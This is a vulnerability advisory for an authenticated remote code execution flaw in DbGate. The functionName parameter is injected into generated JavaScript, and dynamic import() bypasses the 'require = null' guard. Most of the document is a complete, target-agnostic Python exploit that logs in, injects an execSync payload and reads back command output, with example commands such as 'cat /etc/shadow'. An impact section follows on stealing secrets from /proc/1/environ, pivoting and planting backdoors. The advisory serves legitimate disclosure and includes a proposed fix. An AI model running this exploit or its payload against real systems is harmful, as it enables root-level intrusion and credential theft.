CVE-2026-47670
Authenticated Remote Code Execution via loadReader functionName code injection in DbGate
Description
### Summary

DbGate is vulnerable to authenticated Remote Code Execution (RCE). Any user with valid DbGate credentials can execute arbitrary OS commands as the DbGate process user (root in the Docker image) by exploiting an unsanitized `functionName` parameter in the `/runners/load-reader` endpoint. The `require = null` mitigation is trivially bypassed via dynamic `import()`.

<br/>

### Details

**Code injection via `functionName` in loadReader**

The `/runners/load-reader` endpoint interpolates the `functionName` parameter directly into a dynamically generated JavaScript script template without any sanitization:

```javascript
// packages/api/src/controllers/runners.js (loadReader / loaderScriptTemplate)
const reader = await dbgateApi.${functionName}({...});
```

By injecting a newline character into `functionName`, an attacker breaks out of the template expression and injects arbitrary JavaScript code. The injected code uses `await import('child_process')` to bypass the `require = null` mitigation. Because `import()` is language syntax rather than a function binding, it cannot be nullified by reassignment. The result is arbitrary command execution as the process user (root in Docker).

The June 2025 security fix ([commit cf3f95c](https://github.com/dbgate/dbgate/commit/cf3f95c952)) added `require = null` to the generated script, but this is trivially bypassed:

```javascript
// Mitigation in generated script:
require = null;

// Bypass via dynamic import (language keyword, cannot be nullified):
const { execSync } = await import('child_process');
execSync('arbitrary command');
```

**Root cause:** `functionName` is user-controlled input that is interpolated into code without sanitization. The fix should validate `functionName` against an allowlist of known reader functions, or at minimum against a strict identifier pattern (e.g., `/^[a-zA-Z]+$/`), or replace string interpolation with a lookup table.
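The validation described under the root cause could look roughly like the sketch below. It is not DbGate's actual patch: `ALLOWED_READER_FUNCTIONS`, `validateFunctionName`, and `renderLoaderScript` are hypothetical names, the allowlist holds only `csvReader` because that is the only reader named in this advisory, and the template is a simplified stand-in for the real `loaderScriptTemplate`.

```javascript
// Hypothetical allowlist. The advisory does not enumerate the reader
// functions that dbgateApi exports; csvReader is the only one it names.
const ALLOWED_READER_FUNCTIONS = new Set(['csvReader']);

// Identifier pattern suggested in the advisory. Without the `m` flag,
// `$` matches only at the very end of the input, so a trailing newline
// is rejected as well.
const FUNCTION_NAME_PATTERN = /^[a-zA-Z]+$/;

// Returns the name unchanged if it is safe to interpolate, throws otherwise.
function validateFunctionName(functionName) {
  if (typeof functionName !== 'string') {
    throw new TypeError('functionName must be a string');
  }
  if (!FUNCTION_NAME_PATTERN.test(functionName)) {
    throw new Error('functionName contains disallowed characters');
  }
  if (!ALLOWED_READER_FUNCTIONS.has(functionName)) {
    throw new Error('functionName is not an allowed reader function');
  }
  return functionName;
}

// Simplified stand-in for the script template: the name is validated
// before it is ever placed into generated code.
function renderLoaderScript(functionName) {
  const safeName = validateFunctionName(functionName);
  return `const reader = await dbgateApi.${safeName}({});`;
}
```

With this check in place, `renderLoaderScript('csvReader')` yields a single template line, while a value such as `"csvReader\n...\n//"` is rejected before any script is generated. The pattern check alone would already stop the newline breakout; the allowlist additionally restricts callers to functions that are meant to be readers.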
<br/>

### PoC

The PoC can be run against a test environment using Docker Compose:

```yaml
services:
  sectest-dbgate:
    image: dbgate/dbgate:7.1.4-alpine
    ports:
      - "80:3000"
    environment:
      LOGINS: admin
      LOGIN_PASSWORD_admin: SuperSecretPassword123
      WEB_ROOT: /
      CONNECTIONS: con1
      LABEL_con1: MySQL
      SERVER_con1: sectest-mysql
      USER_con1: dbuser
      PASSWORD_con1: dbpassword
      PORT_con1: 3306
      ENGINE_con1: mysql@dbgate-plugin-mysql
  sectest-mysql:
    image: mysql:8.0
    environment:
      MYSQL_ROOT_PASSWORD: rootpass
      MYSQL_DATABASE: testdb
      MYSQL_USER: dbuser
      MYSQL_PASSWORD: dbpassword
```

PoC Script:

```python
#!/usr/bin/env python3
"""
DBGate — Authenticated RCE PoC
===============================
Root-level command execution against auth-enabled DBGate with valid credentials.

Vulnerability — RCE via loadReader functionName code injection
  The /runners/load-reader endpoint interpolates `functionName` directly into
  a dynamically generated JS script without sanitization. A newline in
  functionName breaks out of the template expression and allows arbitrary
  code execution as root (Docker default). The `require = null` mitigation
  added in June 2025 is trivially bypassed via dynamic `import()` (a language
  keyword, not a function).

Affected versions: All DbGate versions (tested on 6.1.4, 6.2.0, 7.1.4)
Fixed in:          NOT FIXED as of DbGate 7.1.4
Tested on:         dbgate/dbgate:7.1.4-alpine
"""

import argparse
import json
import sys
import time
import uuid

import requests

requests.packages.urllib3.disable_warnings()

COMMON_ROOTS = ["", "/dbgate", "/db", "/admin", "/gate", "/app"]


def banner(host, command, user):
    print(f"""
┌─────────────────────────────────────────────────────┐
│  DBGate — Authenticated RCE PoC                     │
│  loadReader functionName code injection             │
│  Affects ALL versions (unpatched as of 7.1.4)       │
└─────────────────────────────────────────────────────┘
 Target : {host}
 User   : {user}
 Command: {command}
""")


def build_base(host, port=None):
    if "://" not in host:
        host = f"http://{host}"
    scheme, rest = host.split("://", 1)
    rest = rest.rstrip("/")
    slash = rest.find("/")
    if slash == -1:
        hostport, path = rest, ""
    else:
        hostport, path = rest[:slash], rest[slash:]
    if port:
        hostport = hostport.rsplit(":", 1)[0] + f":{port}"
    elif ":" not in hostport:
        hostport += ":80"
    return f"{scheme}://{hostport}", path


def discover_web_root(base_host, explicit_path=""):
    if explicit_path:
        return f"{base_host}{explicit_path}"
    for root in COMMON_ROOTS:
        url = f"{base_host}{root}"
        try:
            r = requests.post(f"{url}/config/get", json={}, timeout=3, verify=False)
            if r.status_code == 200 and "version" in r.text:
                if root:
                    print(f" [+] Auto-detected WEB_ROOT: {root}")
                return url
        except Exception:
            pass
    return base_host


def phase1_recon(base):
    print("[Phase 1] Reconnaissance")
    info = {}

    try:
        r = requests.post(f"{base}/config/get", json={}, timeout=5, verify=False)
        if r.status_code == 200:
            cfg = r.json()
            info["config"] = cfg
            version = cfg.get("version", "?")
            print(f" [+] Version : {version}")
            print(f" [+] Docker : {cfg.get('isDocker', '?')}")
            print(f" [+] Data dir : {cfg.get('connectionsFilePath', '?').rsplit('/', 1)[0]}")
    except Exception:
        print(f" [!] /config/get failed")

    try:
        r = requests.post(f"{base}/auth/get-providers", json={}, timeout=5, verify=False)
        if r.status_code == 200:
            pdata = r.json()
            info["providers"] = pdata
            providers = pdata.get("providers", [])
            names = [p.get("name", "?") for p in providers]
            default = pdata.get("default", "?")
            print(f" [+] Auth : {', '.join(names)} (default: {default})")
            info["default_amoid"] = default
    except Exception:
        pass

    print()
    return info


def phase2_authenticate(base, info, user, password):
    print("[Phase 2] Authentication")
    amoid = info.get("default_amoid", "logins")

    try:
        r = requests.post(
            f"{base}/auth/login",
            json={"amoid": amoid, "login": user, "password": password},
            timeout=5,
            verify=False,
        )
        if r.status_code == 200:
            data = r.json()
            token = data.get("accessToken")
            if token:
                print(f" [+] Authenticated as '{user}'")
                print(f" [+] JWT obtained: {token[:50]}...")
                print()
                return token
            else:
                error = data.get("error", "no accessToken in response")
                print(f" [-] Login failed: {error}")
        else:
            print(f" [-] Login failed (HTTP {r.status_code})")
    except Exception as e:
        print(f" [!] Login error: {e}")

    print()
    return None


def phase3_rce(base, token, command):
    """
    RCE via loadReader functionName code injection.

    functionName is interpolated into a JS script template:
        const reader = await dbgateApi.{functionName}({...});

    A newline in functionName breaks out and injects arbitrary code.
    import() bypasses the require=null mitigation (import is a keyword).
    """
    print("[Phase 3] RCE via loadReader code injection")
    print(f" [*] Command: {command}")

    uid = uuid.uuid4().hex[:12]
    jslout = f"/tmp/_rce_{uid}.jsonl"

    escaped_cmd = (command
                   .replace("\\", "\\\\")
                   .replace("'", "\\'")
                   .replace("`", "\\`"))

    payload_fn = (
        "csvReader\n"
        "var _r = (await import('child_process'))"
        f".execSync('{escaped_cmd}',{{timeout:30000}})"
        ".toString();\n"
        "var NL = String.fromCharCode(10);\n"
        "var _hdr = JSON.stringify({__isStreamHeader:true,"
        "columns:[{columnName:'out'}]});\n"
        "var _rows = _r.split(NL)"
        ".filter(function(l){return l.length>0})"
        ".map(function(l){return JSON.stringify({out:l})})"
        ".join(NL);\n"
        f"(await import('fs')).writeFileSync('{jslout}',"
        " _hdr + NL + _rows + NL);\n"
        "//"
    )

    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }

    print(f" [*] Injecting payload via functionName (bypasses require=null)")
    try:
        r = requests.post(
            f"{base}/runners/load-reader",
            json={"functionName": payload_fn, "props": {}},
            headers=headers,
            timeout=35,
            verify=False,
        )
        print(f" [*] Payload sent (status {r.status_code})")
    except requests.exceptions.Timeout:
        print(f" [*] Payload sent (timed out — command may still be running)")
    except requests.exceptions.ConnectionError:
        print(f" [*] Payload sent (connection reset — expected for some versions)")
    except Exception as e:
        print(f" [!] Send error: {e}")
        return None

    print(f" [*] Waiting for execution...")
    for wait in [0.5, 1, 1.5, 2, 3, 5]:
        time.sleep(wait)
        try:
            r = requests.post(
                f"{base}/jsldata/get-rows",
                json={"jslid": f"file://{jslout}", "offset": 0, "limit": 10000},
                headers=headers,
                timeout=5,
                verify=False,
            )
            if r.status_code == 200:
                rows = r.json()
                if isinstance(rows, list) and len(rows) > 0:
                    print(f" [+] Output captured ({len(rows)} lines)")
                    print()
                    return "\n".join(
                        row.get("out", "") for row in rows if isinstance(row, dict)
                    )
        except requests.exceptions.ConnectionError:
            try:
                time.sleep(1)
                r = requests.post(
                    f"{base}/jsldata/get-rows",
                    json={"jslid": f"file://{jslout}", "offset": 0, "limit": 10000},
                    headers=headers,
                    timeout=5,
                    verify=False,
                )
                if r.status_code == 200:
                    rows = r.json()
                    if isinstance(rows, list) and len(rows) > 0:
                        print(f" [+] Output captured ({len(rows)} lines, after reconnect)")
                        print()
                        return "\n".join(
                            row.get("out", "") for row in rows if isinstance(row, dict)
                        )
            except Exception:
                pass
        except Exception:
            pass

    print(f" [-] Could not retrieve output (command may have failed)")
    print()
    return None


def main():
    p = argparse.ArgumentParser(
        add_help=False,
        description="DBGate — Authenticated RCE PoC (loadReader code injection)",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=(
            "Any authenticated DbGate user can escalate to root-level\n"
            "command execution via unsanitized functionName injection.\n"
            "This vulnerability is UNPATCHED as of DbGate 7.1.4.\n"
            "\n"
            "examples:\n"
            " %(prog)s -t localhost -u admin -P 'password' -c 'id'\n"
            " %(prog)s -t 10.0.0.5:3000 -u admin -P 's3cret' -c 'cat /etc/shadow'\n"
            " %(prog)s -t target.internal/dbgate -u admin -P 'pass' -c 'env'\n"
        ),
    )
    p.add_argument("-t", "--target", required=True, help="Target host[:port]")
    p.add_argument("-u", "--user", required=True, help="DbGate username")
    p.add_argument("-P", "--password", required=True, help="DbGate password")
    p.add_argument("-c", "--command", required=True, help="OS command to execute")
    p.add_argument("-p", "--port", type=int, default=None, help="Override port")

    if len(sys.argv) == 1:
        p.print_help()
        sys.exit(1)

    args = p.parse_args()

    base_host, path = build_base(args.target, args.port)
    banner(base_host, args.command, args.user)

    base = discover_web_root(base_host, path)
    print(f" [*] API endpoint : {base}")
    print()

    info = phase1_recon(base)
    if not info.get("config"):
        print("[!] Cannot reach target — verify host/port/web-root")
        sys.exit(1)

    token = phase2_authenticate(base, info, args.user, args.password)
    if not token:
        print("[!] Authentication failed — check username/password")
        sys.exit(1)

    output = phase3_rce(base, token, args.command)
    if output is not None:
        print("─" * 60)
        print(output.rstrip())
        print("─" * 60)
        print()
        print("[+] RCE successful: authenticated user → root command execution")
    else:
        print("[!] No output captured (command may have failed or timed out)")
        sys.exit(1)


if __name__ == "__main__":
    main()
```

Running the PoC script (requires valid credentials):

```bash
python3 poc.py -t http://localhost -u admin -P 'SuperSecretPassword123' -c 'id'
```

Terminal output:

```
┌─────────────────────────────────────────────────────┐
│  DBGate — Authenticated RCE PoC                     │
│  loadReader functionName code injection             │
│  Affects ALL versions (unpatched as of 7.1.4)       │
└─────────────────────────────────────────────────────┘
 Target : http://localhost:80
 User   : admin
 Command: id

 [*] API endpoint : http://localhost:80

[Phase 1] Reconnaissance
 [+] Version : 7.1.4
 [+] Docker : True
 [+] Data dir : /root/.dbgate
 [+] Auth : Login & Password (default: logins)

[Phase 2] Authentication
 [+] Authenticated as 'admin'
 [+] JWT obtained: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6I...

[Phase 3] RCE via loadReader code injection
 [*] Command: id
 [*] Injecting payload via functionName (bypasses require=null)
 [*] Payload sent (status 500)
 [*] Waiting for execution...
 [+] Output captured (1 lines)

────────────────────────────────────────────────────────────
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
────────────────────────────────────────────────────────────

[+] RCE successful: authenticated user → root command execution
```

<br/>

### Impact

- **Privilege escalation to root**: an authenticated DbGate user escalates from web UI access to a root OS shell inside the container.
- **Infrastructure secret theft**: `/proc/1/environ` exposes all container environment variables, which may include API keys, cloud tokens, and other secrets beyond the database credentials and are not visible through the DbGate UI.
- **Other users' credentials**: the attacker can extract the `LOGIN_PASSWORD_*` environment variables for all DbGate users, enabling password-reuse attacks against other systems.
- **Network pivot**: from inside the container, the attacker can scan and reach other services on the network that are not exposed externally.
- **Persistent backdoor**: root access allows modifying the DbGate application itself (e.g. `bundle.js`), installing cron jobs, or adding SSH keys. Such a backdoor survives credential rotation and DbGate restarts.